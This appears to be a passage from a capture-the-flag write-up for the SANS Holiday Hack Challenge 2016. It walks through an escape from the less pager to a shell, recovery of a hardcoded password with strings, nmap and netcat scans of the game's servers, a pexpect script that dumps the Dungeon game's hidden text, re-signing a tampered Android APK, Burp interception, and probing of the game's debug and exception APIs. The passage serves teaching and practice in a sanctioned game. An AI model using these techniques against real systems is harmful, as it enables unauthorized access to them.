  • -p i = Number of Pitts
  • -r i = Number of Rooms (Although Wumpus refuses to play with less than 6 rooms)
[email protected]:~$ ./wumpus -b 0 -p 0 -a 100 -r 6
Instructions? (y-n) n
You're in a cave with 6 rooms and 3 tunnels leading from each room.
There are 0 bats and 0 pits scattered throughout the cave, and your
quiver holds 100 custom super anti-evil Wumpus arrows.  Good luck.
You are in room 6 of the cave, and have 100 arrows left.
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 1, 3, and 5.
Move or shoot? (m-s) #

The Wumpus is in one of the adjoining rooms so im just going to fire an arrow in to each one.

You are in room 6 of the cave, and have 100 arrows left.
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 1, 3, and 5.
Move or shoot? (m-s) s 1
*thwock!* *groan* *crash*
A horrible roar fills the cave, and you realize, with a smile, that you
have slain the evil Wumpus and won the game!  You don't want to tarry for
long, however, because not only is the Wumpus famous, but the stench of
dead Wumpus is also quite well known, a stench plenty enough to slay the
mightiest adventurer at a single whiff!!
Passphrase:
WUMPUS IS MISUNDERSTOOD
Care to play another game? (y-n)

And we have the password to the next room: WUMPUS IS MISUNDERSTOOD

When you first open the terminal you are presented with the following

Great lets start the train

                ==== MAIN MENU ====
STATUS:                         Train Status
BRAKEON:                        Set Brakes
BRAKEOFF:                       Release Brakes
START:                          Start Train
HELP:                           Open the help document
QUIT:                           Exit console
menu:main> START
Checking brakes....
Brake must be off to start the train.
                ==== MAIN MENU ====
STATUS:                         Train Status
BRAKEON:                        Set Brakes
BRAKEOFF:                       Release Brakes
START:                          Start Train
HELP:                           Open the help document
QUIT:                           Exit console

menu:main> BRAKEOFF

*******CAUTION*******
The brake has been released!
*******CAUTION*******
off

                ==== MAIN MENU ====

STATUS:                         Train Status
BRAKEON:                        Set Brakes
BRAKEOFF:                       Release Brakes
START:                          Start Train
HELP:                           Open the help document
QUIT:                           Exit console

menu:main> START

Checking brakes....
Enter Password:

Needs a password. Lets see if HELP gives us anything

**STATUS** option will show you the current state of the train (brakes, boiler, boiler
 temp, coal level)
**BRAKEON** option enables the brakes.  Brakes should be enabled at every stop and whi
le the train is not in use.
  
**BRAKEOFF** option disables the brakes.  Brakes must be disabled before the **START**
 command will execute.
**START** option will start the train if the brake is released and the user has the co
rrect password.
**HELP** brings you to this file.  If it's not here, this console cannot do it, unLESS
 you know something I don't.
Just in case you wanted to know, here's a really good Cranberry pie recipe:
Ingredients
1 recipe pastry for a 9 inch double crust pie
1 1/2 cups white sugar
1/3 cup all-purpose flour
1/4 teaspoon salt
1/2 cup water 
1 (12 ounce) package fresh cranberries
1/4 cup lemon juice
1 dash ground cinnamon
2 teaspoons butter
:

Looks like the help is being display in less, we can confirm this by pressing the ‘h’ key and getting the less help options.

                  SUMMARY OF LESS COMMANDS
     Commands marked with * may be preceded by a number, N.
     Notes in parentheses indicate the behavior if N is given.
     A key preceded by a caret indicates the Ctrl key; thus ^K is ctrl-K.
 h  H                 Display this help.
 q  :q  Q  :Q  ZZ     Exit.
---------------------------------------------------------------------------

If we read through the help file something really interesting jumps out.

---------------------------------------------------------------------------
                    MISCELLANEOUS COMMANDS
  -<flag>              Toggle a command line option [see OPTIONS below].
  --<name>             Toggle a command line option, by name.
  _<flag>              Display the setting of a command line option.
  __<name>             Display the setting of an option, by name.
  +cmd                 Execute the less cmd each time a new file is examined.
  !command             Execute the shell command with $SHELL.

We can run shell commands with the ! prefix.

Lets try opening an interactive shell with ! /bin/bash

! /bin/bash
[email protected]:~$ ls -ahtl
total 40K
drwxr-xr-x 2 conductor conductor 4.0K Dec 10 19:39 .
drwxr-xr-x 6 root      root      4.0K Dec 10 19:39 ..
-rwxr-xr-x 1 root      root       11K Dec 10 19:36 ActivateTrain
-rw-r--r-- 1 root      root      1.5K Dec 10 19:36 TrainHelper.txt
-rwxr-xr-x 1 root      root      1.6K Dec 10 19:36 Train_Console
-rw-r--r-- 1 conductor conductor  220 Nov 12  2014 .bash_logout
-rw-r--r-- 1 conductor conductor 3.5K Nov 12  2014 .bashrc
-rw-r--r-- 1 conductor conductor  675 Nov 12  2014 .profile
[email protected]:~$

Nice, ActivateTrain has the executable flag set. I wonder if its as simple as running this.

! ./ActivateTrain
 MONTH   DAY     YEAR          HOUR   MIN
  +-----+ +----+ +------+  O AM +----+ +----+      DISCONNECT CAPACITOR DRIVE
  | NOV | | 16 | | 1978 |       | 10 |:| 21 |           BEFORE OPENING
  +-----+ +----+ +------+  X PM +----+ +----+     +------------------------+
                DESTINATION TIME                  |                        |
  +-----------------------------------------+     |    +XX         XX+     |
  +-----------------------------------------+     |    |XXX       XXX|     |
                                                  |  +-+ XXX     XXX +-+   |
   MONTH   DAY     YEAR          HOUR   MIN       |       XXX   XXX        |
  +-----+ +----+ +------+  X AM +----+ +----+     |         XXXXX          |
  | DEC | | 19 | | 2016 |       | 08 |:| 45 |     |          XXX           |
  +-----+ +----+ +------+  O PM +----+ +----+     |          XXX           |
                  PRESENT TIME                    |          XXX           |
  +-----------------------------------------+     | SHIELD EYES FROM LIGHT |
  +-----------------------------------------+     |          XXX           |
                                                  |          XX+-+         |
   MONTH   DAY     YEAR          HOUR   MIN       |                        |
  +-----+ +----+ +------+  O AM +----+ +----+     +------------------------+
  | NOV | | 16 | | 1978 |       | 10 |:| 21 |            +---------+
  +-----+ +----+ +------+  X PM +----+ +----+            |ACTIVATE!|
                LAST TIME DEPARTED                       +---------+
Press Enter to initiate time travel sequence.

Seems like this is the Back To The Future Train and its just sent us back to 1978

And if you travel up to the top of the North Pole, through the Wumpus door and in to the DFER room you will find where Santa Clause is being held.

We found Santa :) But he doesn’t know who kidnapped him.

I had managed to bypass the train application but i still wanted to know what the password was. So back to the console.

Running strings against the Train_Console application gives us the answer we were looking for.

[email protected]:~$ strings Train_Console                
#!/bin/bash
HOMEDIR="/home/conductor"
CTRL="$HOMEDIR/"
DOC="$HOMEDIR/TrainHelper.txt"
PAGER="less"
BRAKE="on"
PASS="24fb3e89ce2aa0ea422c3d511d40dd84"
print_header() {
        echo ""
        echo "Train Management Console: AUTHORIZED USERS ONLY"

Running the console again and using the password we found works as well.

We found Santa :) but our task is not yet complete. We need to know Who took Santa and Why.

Joshua came to the obvious conclusion, “You know, Jess, we should probably find the villain who tried to kidnap Santa and bring him to justice. If we don’t, Santa’s kidnapper could strike again! Neither Santa nor Christmas are really safe with this nefarious villain on the loose. How are we ever going to find this bad guy?”

Jessica responded, “I’ve noticed some really interesting issues in that SantaGram application that might help us get to the bottom of this whole caper. But, I’d need to exploit SantaGram and its associated servers to do so. Do you think we’re allowed to attack these systems?”

Reading the full intro to question 7 it suggests that the APK file will hold some clues and any IP’s we find we must check they are in scope by asking Tom Hessman in game before starting any testing.

There are 6 items for us to retrieve audio files from.

  • The Mobile Analytics Server (Via credentialed login access)
  • The Dungeon Game
  • The Debug Server
  • The Banner Ad Server
  • The Uncaught Exception Handler Server
  • The Mobile Analytics Server (Post Authentication)

First lets find all the targets. We know the APK holds clues and we already decompiled the source so lets have a look there.

[email protected]:~/Sans2016$ grep -r analytics SantaGram_4.2
SantaGram_4.2/res/values/strings.xml:    <string name="analytics_launch_url">https://analytics.northpolewonderland.com/report.php?type=launch</string>
SantaGram_4.2/res/values/strings.xml:    <string name="analytics_usage_url">https://analytics.northpolewonderland.com/report.php?type=usage</string>
SantaGram_4.2/res/values/public.xml:    <public type="string" name="analytics_launch_url" id="0x7f070015" />
SantaGram_4.2/res/values/public.xml:    <public type="string" name="analytics_usage_url" id="0x7f070016" />

dungeon returns another similar result a domain listed in  res/values/strings.xml file. So lets take a closer look at that.

<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="abc_action_bar_home_description">Navigate home</string>
    <string name="abc_action_bar_home_description_format">%1$s, %2$s</string>
    <string name="abc_action_bar_home_subtitle_description_format">%1$s, %2$s, %3$s</string>
    <string name="abc_action_bar_up_description">Navigate up</string>
    <string name="abc_action_menu_overflow_description">More options</string>
    <string name="abc_action_mode_done">Done</string>
    <string name="abc_activity_chooser_view_see_all">See all</string>
    <string name="abc_activitychooserview_choose_application">Choose an app</string>
    <string name="abc_capital_off">OFF</string>
    <string name="abc_capital_on">ON</string>
    <string name="abc_search_hint">Search…</string>
    <string name="abc_searchview_description_clear">Clear query</string>
    <string name="abc_searchview_description_query">Search query</string>
    <string name="abc_searchview_description_search">Search</string>
    <string name="abc_searchview_description_submit">Submit query</string>
    <string name="abc_searchview_description_voice">Voice search</string>
    <string name="abc_shareactionprovider_share_with">Share with</string>
    <string name="abc_shareactionprovider_share_with_application">Share with %s</string>
    <string name="abc_toolbar_collapse_description">Collapse</string>
    <string name="status_bar_notification_info_overflow">999+</string>
    <string name="TAG">SantaGram</string>
    <string name="analytics_launch_url">https://analytics.northpolewonderland.com/report.php?type=launch</string>
    <string name="analytics_usage_url">https://analytics.northpolewonderland.com/report.php?type=usage</string>
    <string name="appVersion">4.2</string>
    <string name="app_name">SantaGram</string>
    <string name="appbar_scrolling_view_behavior">android.support.design.widget.AppBarLayout$ScrollingViewBehavior</string>
    <string name="banner_ad_url">http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5</string>
    <string name="bottom_sheet_behavior">android.support.design.widget.BottomSheetBehavior</string>
    <string name="character_counter_pattern">%1$d / %2$d</string>
    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
    <string name="debug_data_enabled">true</string>
    <string name="dungeon_url">http://dungeon.northpolewonderland.com/</string>
    <string name="exhandler_url">http://ex.northpolewonderland.com/exception.php</string>
    <string name="title_activity_comments">Comments</string>
</resources>

There are our domains, lets get the IP’s so we can check whats in scope with a quick nslookup

  • analytics.northpolewonderland.com – 104.198.252.157
  • dungeon.northpolewonderland.com – 35.184.47.139
  • dev.northpolewonderland.com – 35.184.63.245
  • ex.northpolewonderland.com – 104.154.196.33
  • ads.northpolewonderland.com – 104.198.221.240

Tom Confirms these are all in score and suggest that dirbuster is not going to help me

With the scope confirmed lets spin up a Kali box and get started.

Lets go have a look at the site.

As was suggested this needs a valid logon. We found a logon inside the apk earlier. lets try that.

Username = Guest, Password = busyreindeer78 and we are logged in successfully, more than that right at the top of the menu bar is a link to download an MP3. Click the link and we get clip number 2 discombobulatedaudio2.mp3

Visiting the dungeons main page is not as revealing as the last pages were.

It looks like a game and an elf in the game will trade for secrets! Looks like we need to beat the game and talk to the elf. But where is the game?

Lets spin up nmap and see what else is on this host. We run a basic namp scan against standard TCP ports.

. . .  Snip . . . 
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 4e:cd:15:a7:44:ed:87:d5:41:81:c2:0e:78:db:c0:d0 (DSA)
|   2048 5b:14:72:d1:17:a2:3f:98:fb:fe:6c:7d:29:49:19:a2 (RSA)
|_  256 6a:8d:56:49:a3:f5:8c:fd:14:42:a7:c0:4e:ef:a8:64 (ECDSA)
80/tcp    open  http    nginx 1.6.2
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.6.2
|_http-title: About Dungeon
11111/tcp open  vce?
. . . Snip . . .

An open port on 11111, spidey sense is tingling, lets point netcat at that port and see what we get.

[email protected]:~# nc dungeon.northpolewonderland.com 11111
Welcome to Dungeon.			This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>

Fun an old school MUD. Unlike the wumpus i don’t think we can bypass this with command line options. trying basic escape options doesn’t seem to reveal any obvious flaws either.

>! /bin/bash
An interesting idea, but...
Not a prayer.
>

Pepper Minstix An Elf in the North Pole also gave us a link to an old version of the dungeon game. http://www.northpolewonderland.com/dungeon.zip Its probably useful to test this game rather than the online version for now.

With the game downloaded there are two files. dungeon and dtextc.dat. Running the dungeon file gives us the same output as the netcat connection so we are in the right place. Lets start simple with strings.

There are some interesting strings in there but nothing that looks like what we are looking for. From these strings we can identify the game as Zork or at least a derivative of it. And this game is not small. The map shows many rooms and many challenges before reaching the end. Looks like I’m going to have to cheat.

There were some interesting commands in the binary that are not mentioned in the online help lets see if we can get to some of these.

Valid commands are:
AA- Alter ADVS          DR- Display ROOMS
AC- Alter CEVENT        DS- Display state
AF- Alter FINDEX        DT- Display text
AH- Alter HERE          DV- Display VILLS
AN- Alter switches      DX- Display EXITS
AO- Alter OBJCTS        DZ- Display PUZZLE
AR- Alter ROOMS         D2- Display ROOM2
AV- Alter VILLS         EX- Exit
AX- Alter EXITS         HE- Type this message
AZ- Alter PUZZLE        NC- No cyclops
DA- Display ADVS        ND- No deaths
DC- Display CEVENT      NR- No robber
DF- Display FINDEX      NT- No troll
DH- Display HACKS       PD- Program detail
DL- Display lengths     RC- Restore cyclops
DM- Display RTEXT       RD- Restore deaths
DN- Display switches    RR- Restore robber
DO- Display OBJCTS      RT- Restore troll
DP- Display parser      TK- Take
No robber.
No troll.
No cyclops.
No deaths.
Restored robber.
Restored troll.
Restored cyclops.
Restored deaths.
Taken.

After playing around in the game for a while trying a few things i decided to take a more systematic approach and use ltrace to see whats happening as the game is played.

[email protected]:~/Desktop/dungeon# ltrace ./dungeon
__libc_start_main(0x4060a3, 1, 0x7fff14c5c378, 0x419570 <unfinished ...>
getenv("TERM")                                   = "xterm-256color"
tgetent(0x7fff14c5b9f0, 0x7fff14c5edbf, 0x7fff14c5edbf, 12) = 1
tgetnum(0x41e088, 42, 0, 0)                      = 24
getuid()                                         = 0
fopen("dtextc.dat", "r")                         = 0x19e62c0
_IO_getc(0x19e62c0)                              = '\0'
_IO_getc(0x19e62c0)                              = '\002'
_IO_getc(0x19e62c0)                              = '\0'
_IO_getc(0x19e62c0)                              = '\a'
_IO_getc(0x19e62c0)                              = '\0'
_IO_getc(0x19e62c0)                              = 'H'
_IO_getc(0x19e62c0)                              = '\002'
_IO_getc(0x19e62c0)                              = 'I'

. . . 

_IO_getc(0x19e62c0)                              = '^'
_IO_getc(0x19e62c0)                              = '\332'
_IO_getc(0x19e62c0)                              = 'S'
_IO_getc(0x19e62c0)                              = '\332'
_IO_getc(0x19e62c0)                              = 'F'
_IO_getc(0x19e62c0)                              = '\332'
_IO_getc(0x19e62c0)                              = 'A'
ftell(0x19e62c0, 65, 0xffffffff, 0x7f7a5e7465c0) = 9063
time(0x7fff14c5c1f0)                             = 1481834271
localtime(0x7fff14c5c1f0)                        = 0x7f7a5ea084a0
chroot(0x41a524, 0, 51, 2016)                    = -1
perror("chroot"chroot: No such file or directory
)                                 = <void>
setuid(1000)                                     = 0
setgid(1000)                                     = -1
fseek(0x19e62c0, 9063, 0, 9063)                  = 0
_IO_getc(0x19e62c0)                              = '\036'
putchar(87, 30, 73, 8192)                        = 87
_IO_getc(0x19e62c0)                              = '\005'
putchar(101, 5, 97, 512)                         = 101
_IO_getc(0x19e62c0)                              = '\0'
putchar(108, 0, 110, 0xfbad2a84)                 = 108
_IO_getc(0x19e62c0)                              = ','


. . . 

_IO_getc(0x19e62c0)                              = '}'
putchar(45, 125, 97, 0xfbad2a84)                 = 45
_IO_getc(0x19e62c0)                              = 'k'
putchar(55, 107, 110, 0xfbad2a84)                = 55
_IO_getc(0x19e62c0)                              = 'G'
putchar(56, 71, 76, 0xfbad2a84)                  = 56
_IO_getc(0x19e62c0)                              = '{'
putchar(46, 123, 97, 0xfbad2a84)                 = 46
_IO_getc(0x19e62c0)                              = '['
putchar(10, 91, 110, 0xfbad2a84Welcome to Dungeon.			This version created 11-MAR-78.
)                 = 10
fseek(0x19e62c0, 0x15237, 0, 0x15237)            = 0
_IO_getc(0x19e62c0)                              = '\300'
putchar(89, 192, 73, 0x15000)                    = 89
_IO_getc(0x19e62c0)                              = '\337'
putchar(111, 223, 97, 0xfbad2a84)                = 111


. . . 

Lots more seeking and putting to screen
. . . 

_IO_getc(0x1da82c0)                              = '\226'
putchar(101, 150, 121, 0xfbad2a84)               = 101
_IO_getc(0x1da82c0)                              = '\225'
putchar(114, 149, 108, 0xfbad2a84)               = 114
_IO_getc(0x1da82c0)                              = '\206'
putchar(101, 134, 111, 0xfbad2a84)               = 101
_IO_getc(0x1da82c0)                              = '\321'
putchar(46, 209, 114, 0xfbad2a84)                = 46
_IO_getc(0x1da82c0)                              = '\304'
putchar(10, 196, 74, 0xfbad2a84There is a small wrapped mailbox here.
)                 = 10
putchar(62, 1, 0xe420, 1)                        = 62
fflush(0x7f1c38178600>)                           = 0
fgets(

Watching the dungeon run its opening the dat file and reading in all the chars, try to set a chroot jail, then it puts chars from the dat file on to the screen as text. It pauses at the end waiting for our input.

I try a simple command ‘look’

putchar(10, 196, 74, 0xfbad2a84There is a small wrapped mailbox here.
)                 = 10
putchar(62, 1, 0xe420, 1)                        = 62
fflush(0x7f1c38178600>)                           = 0
fgets(look
"look\n", 78, 0x7f1c381778c0)              = 0x625a84
__ctype_b_loc()                                  = 0x7f1c385a76b0
toupper('l')                                     = 'L'
__ctype_b_loc()                                  = 0x7f1c385a76b0
toupper('o')                                     = 'O'
__ctype_b_loc()                                  = 0x7f1c385a76b0
toupper('o')                                     = 'O'
__ctype_b_loc()                                  = 0x7f1c385a76b0
toupper('k')                                     = 'K'
strcmp("LOOK", "GDT")                            = 5
rand(6, 0, 0, 0)                                 = 0x6b8b4567
fseek(0x1da82c0, 0x15237, 0, 0x15237)            = 0
_IO_getc(0x1da82c0)                              = '\300'
putchar(89, 192, 73, 0x15000)                    = 89

Now that’s interesting, it takes my input then converts it to uppercase and compares it against a string “GDT” before processing my actions. Lets see what happens if i give it GDT. I’m running this without ltrace for readability.

[email protected]:~/Desktop/dungeon# ./dungeon 
chroot: No such file or directory
Welcome to Dungeon.			This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>GDT
GDT>help
Valid commands are:
AA- Alter ADVS          DR- Display ROOMS
AC- Alter CEVENT        DS- Display state
AF- Alter FINDEX        DT- Display text
AH- Alter HERE          DV- Display VILLS
AN- Alter switches      DX- Display EXITS
AO- Alter OBJCTS        DZ- Display PUZZLE
AR- Alter ROOMS         D2- Display ROOM2
AV- Alter VILLS         EX- Exit
AX- Alter EXITS         HE- Type this message
AZ- Alter PUZZLE        NC- No cyclops
DA- Display ADVS        ND- No deaths
DC- Display CEVENT      NR- No robber
DF- Display FINDEX      NT- No troll
DH- Display HACKS       PD- Program detail
DL- Display lengths     RC- Restore cyclops
DM- Display RTEXT       RD- Restore deaths
DN- Display switches    RR- Restore robber
DO- Display OBJCTS      RT- Restore troll
DP- Display parser      TK- Take
GDT>

A hidden admin set of options. After playing around with some of the commands its apparent i don’t know enough about the game or its architecture to effectively cheat, however i can display the text that’s used in the game.

GDT>dt
Entry:    1
Welcome to Dungeon.			This version created 11-MAR-78.
GDT>dt
Entry:    2
Done.
GDT>dt
Entry:    3
Revision history:
11-NOV-16	Converted to HHC (V2.7HHC)
11-MAR-91	Converted to C (V2.7)
14-SEP-87	Converted to f77/Unix for pdps and Vaxen (V2.6B)
18-JUL-80	Transportable data base file (V2.5A).
28-FEB-80	Compressed text file (V2.4A).
15-NOV-79	Bug fixes (V2.3A).
18-JAN-79	Revised DECUS version (V2.2A).
10-OCT-78	Puzzle Room (V2.1A).
10-SEP-78	Endgame (V2.0A).
10-AUG-78	DECUS version (V1.1B).
14-JUN-78	Public version with parser (V1.1A).
4-MAR-78	Debugging version (V1.0A).
GDT>

But only one at a time. Time to script something that will read out all the entries for me. I have been playing with pexpect a lot lately, a python library that can interact with command line tools.

import pexpect
run_cmd = "./dungeon"

# Start the process
c = pexpect.spawn(run_cmd)
# Look for an > 
c.expect(">")

# send GDT
c.sendline("GDT")

# Wait for prompt to dsplay "GDT>"
c.expect("GDT>", timeout=60)

# Main loop
for i in range(2000):
    #send "DT", wait for "Entry: " then send the next number in the loop
    c.sendline("DT")
    c.expect("Entry:")

    c.sendline(str(i))

    c.expect("GDT>")
    # Print the output
    print c.before

What follows is a scrolling wall of text that prints out all the elements, at some point it will start typing blank lines and then random data, this is caused by trying to read elements that don’t exist. We can just stop this output and read back to find.

    1022
The thief, who is essentially a pragmatist, dispatches you as a threat

to his livelihood.


    1023

The elf, willing to bargain, says "What's in it for me?"


    1024

The elf, satisified with the trade says - 

Try the online version for the true prize


    1025

"That wasn't quite what I had in mind", he says, tossing

the # into the fire, where it vanishes.


    1026

The elf appears increasingly impatient.


    1027

The elf says - you have conquered this challenge - the game will now end.

It worked we can see what the elf is programmed to say, so now its just a matter of running the script against the online version. We can do this by changing the run_cmd to:

nc dungeon.northpolewonderland.com 11111

and running the script again. This time we get the answer we are looking for. Or at least the way to our answer.

    1022
The thief, who is essentially a pragmatist, dispatches you as a threat
to his livelihood.

    1023
The elf, willing to bargain, says "What's in it for me?"

    1024
The elf, satisified with the trade says - 
send email to "[email protected]" for that which you seek.

    1025
"That wasn't quite what I had in mind", he says, tossing
the # into the fire, where it vanishes.

A few minutes after sending the email we get a reply back.

And our next audio clip. discombobulatedaudio3.mp3

 

There doesn’t seem to be a lot going on here. nmap doesn’t show much in the way of open ports. and the web page is blank. Trying a handful of pages reveals nothing. Lets take a look at the app and see if we can figure out where it is used.

Grep for dev.northpole

[email protected]:~/Sans2016$ grep -r dev.north SantaGram_4.2
SantaGram_4.2/res/values/strings.xml:    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>

grep for debug_data_collection

[email protected]:~/Sans2016$ grep -r debug_data_collection SantaGram_4.2
SantaGram_4.2/res/values/strings.xml:    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
SantaGram_4.2/res/values/public.xml:    <public type="string" name="debug_data_collection_url" id="0x7f07001d" />

grep for 0x7f07001d

[email protected]:~/Sans2016$ grep -r 0x7f07001d SantaGram_4.2
SantaGram_4.2/res/values/public.xml:    <public type="string" name="debug_data_collection_url" id="0x7f07001d" />
SantaGram_4.2/smali/com/northpolewonderland/santagram/EditProfile$1.smali:    const v1, 0x7f07001d

OK after following the chain of variable names we end up on the edit profile page. But viewing this source code doesn’t show much.

We need to launch the app and intercept the traffic to try and understand whats going on here.

The simplest way is to run the app in a virtual environment. The two most popular methods are Android Studio or Genymotion.

To install GenyMotion follow the official guides for your operating system. Once you have GenyMotion installed open up burp and under Proxy –> Options configure burp to listen on all interfaces.

Then in the Android VM go in to wifi settings –> Modify Network and fill in the Proxy Settings for your burp machine. 

Drag the apk in to the window and open it. When you first run you may notice that the app fails to logon or register accounts, this is due to burp using an non trusted certificate. And you can see the error under the alarms tab in burp. To fix this we need to export the certificate from burp and install it in the android vm.

Burp:

  • Under Proxy –> Options Export CA Certificate –> Export –> Certificate in DER Format

Android

  • Drag the certificate file on to the VM window to copy it on to the OS
  • Settings –> Security –> Install From SD Card
  • Choose Internal Storage –> Downloads (SD Card will not see the file)
  • Select the certificate file

With the certificate installed we can now properly intercept all https traffic.

We see a lot of traffic flowing around but we are interested in the Edit Profile page which should somehow lead us to the dev domain.

From here i can change some of my profile settings like Name and Bio. The email address can also be changed if you add the parameters in to the request, but nothing about a dev sub domain.

Looking back in the apk source for all mention of debug we find an option to enable or disable debug mode which is currently set to false

[email protected]:~/Sans2016$ grep -r debug SantaGram_4.2
SantaGram_4.2/res/values/strings.xml:    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
SantaGram_4.2/res/values/strings.xml:    <string name="debug_data_enabled">false</string>

Changing the xml file in the apk is not as simple as rezipping it. We need to recompile and sign the application.

Edit res/values/strings.xml and changing debug_data_enable to true.

Compile the APK

[email protected]:~/Sans2016$ apktool b SantaGram_4.2
I: Using Apktool 2.2.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...

To sign the APK we need to generate a key then use the key on the APK. You may need to install jdk with ‘sudo apt-get install openjdk-9-jdk-headless’

To generate a key use the keytool application

[email protected]:~/Sans2016$ keytool -genkey -v -keystore my-release-key.keystore -alias SantaGram -keyalg RSA -keysize 2048 -validity 10000
Enter keystore password:  
Re-enter new password: 
What is your first and last name?
  [Unknown]:  Santa
What is the name of your organizational unit?
  [Unknown]:  Gram
What is the name of your organization?
  [Unknown]:  SantaGram
What is the name of your City or Locality?
  [Unknown]:  NorthPole
What is the name of your State or Province?
  [Unknown]:  North
What is the two-letter country code for this unit?
  [Unknown]:  NP
Is CN=Santa, OU=Gram, O=SantaGram, L=NorthPole, ST=North, C=NP correct?
  [no]:  Yes

Generating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days
  for: CN=Santa, OU=Gram, O=SantaGram, L=NorthPole, ST=North, C=NP
Enter key password for <SantaGram>
  (RETURN if same as keystore password):  
[Storing my-release-key.keystore]

Then sign it with jarsigner and our new key

[email protected]:~/Sans2016$ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore SantaGram_4.2/dist/SantaGram_4.2.apk SantaGram
Enter Passphrase for keystore: 
   adding: META-INF/MANIFEST.MF
   adding: META-INF/SANTAGRA.SF
   adding: META-INF/SANTAGRA.RSA
  signing: AndroidManifest.xml
  signing: assets/tou.html
  signing: classes.dex
  signing: res/anim-v21/design_bottom_sheet_slide_in.xml
. . . SNIP . . . 
  signing: res/raw/discombobulatedaudio1.mp3
  signing: resources.arsc
jar signed.

Warning: 
The signer's certificate is self-signed.
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-05-10) or after any future revocation date.

If all goes well you should be able to drag the new apk from SantaGram_4.2/dist/ in to the VM and repeat the steps above to see the traffic to dev.northpolewonderland.com when opening the Edit Profile page.

{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504}

Great Now we know how to format the data we can start to play and see what we can get. From this point burp is a bit heavy and Chrome has a nice extension called POSTMan which is designed to quickly generate and view items like this.

We can see that sending the json string we get a response that includes our response and gives us a filename.

{"date":"20161223112641","status":"OK","filename":"debug-20161223112641-0.txt","request":{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504,"verbose":false}}

We can check to see if this is file exists https://dev.northpolewonderland.com/debug-20161223112641-0.txt It does exists and shows us the json object we sent.

{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504}

After playing with a few POSTS and comparing the outputs we can see that in our response there is a field named “verbose” which is set to false. Lets try setting this to true by adding it in to our POST.

{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504, "verbose": true}

And we get back a lot more information.

{"date":"20161223113154","date.len":14,"status":"OK","status.len":"2","filename":"debug-20161223113154-0.txt","filename.len":26,"request":{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504,"verbose":true},"files":["debug-20161223112121-0.txt","debug-20161223112359-0.txt","debug-20161223112506-0.txt","debug-20161223112527-0.txt","debug-20161223112641-0.txt","debug-20161223113154-0.txt","debug-20161224235959-0.mp3","index.php"]}

Which includes an mp3 file. http://dev.northpolewonderland.com/debug-20161224235959-0.mp3

Looking at the sourcecode for the domain, after whitelisting the domain in your adblocker, we can see an interesting javascript tag

__meteor_runtime_config__ = JSON.parse(decodeURIComponent("%7B%22meteorRelease%22%3A%22METEOR%401.4.2.3%22%2C%22meteorEnv%22%3A%7B%22NODE_ENV%22%3A%22production%22%2C%22TEST_METADATA%22%3A%22%7B%7D%22%7D%2C%22PUBLIC_SETTINGS%22%3A%7B%7D%2C%22ROOT_URL%22%3A%22http%3A%2F%2Fads.northpolewonderland.com%22%2C%22ROOT_URL_PATH_PREFIX%22%3A%22%22%2C%22appId%22%3A%221vgh1e61x7h692h4hyt1%22%2C%22autoupdateVersion%22%3A%22537dcf6b4594db16ea2d99d0a920f2deeb7dc9f1%22%2C%22autoupdateVersionRefreshable%22%3A%2205c3f7dba9f3e15efa3d971acf18cab901dc0505%22%2C%22autoupdateVersionCordova%22%3A%22none%22%7D"));

Pepper Minstix An Elf in the North Pole told us about a framework for exploiting sites that use the meteor framework.

Seems simple enough, Install TamperMonkey extension in your browser of choice. Then install the MeteorMiner script. Next time we load the ads page you should see the MeteorMiner interface load

As we navigate around the pages (routes) by clicking on the grey > we can see database entries (Collections) for pages even though we are not logged in.

Looking at the admin/quotes Route we can see a collection for HomeQuotes that contains an audio record

Meteor Miner shows us a lot but we need to use the javascript console in order to view Collection Contents.

In chrome Ctrl + Shift + i will open the console for you. From here we can use the meteor library itself to access data by typing HomeQuotes.find().fetch()

Another MP3 for our trouble. 

http://ads.northpolewonderland.com/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3

 

This is is similar in principal to the debug server in terms of our approach. from the XML file we recovered from the apk we know that there is a php page named exception.php and when we load this page in a browser we are told the Request method must be POST. Back to POSTMan

Create a POST to http://ex.northpolewonderland.com/exception.php and send it

Content type must be: application/json

Ok set a header Content-Type to application/json and send again

POST contains invalid JSON!

Fair one lets add a blank json object in the body and send again

Fatal error! JSON key ‘operation’ must be set to WriteCrashDump or ReadCrashDump.

OK lets do as it says. {“operation”:”WriteCrashDump”}

Fatal error! JSON key ‘data’ must be set.

Keep doing as it says  {“operation”:”WriteCrashDump”, “data”:”merryxmas”}

{
“success” : true,
“folder” : “docs”,
“crashdump” : “crashdump-AMnahP.php”
}

That looks better lets see whats on this page. It seems to have printed out whatever i put in the data field. From here i kind of tunnel visioned for a bit, believing there was a way to use this to execute code on the box.

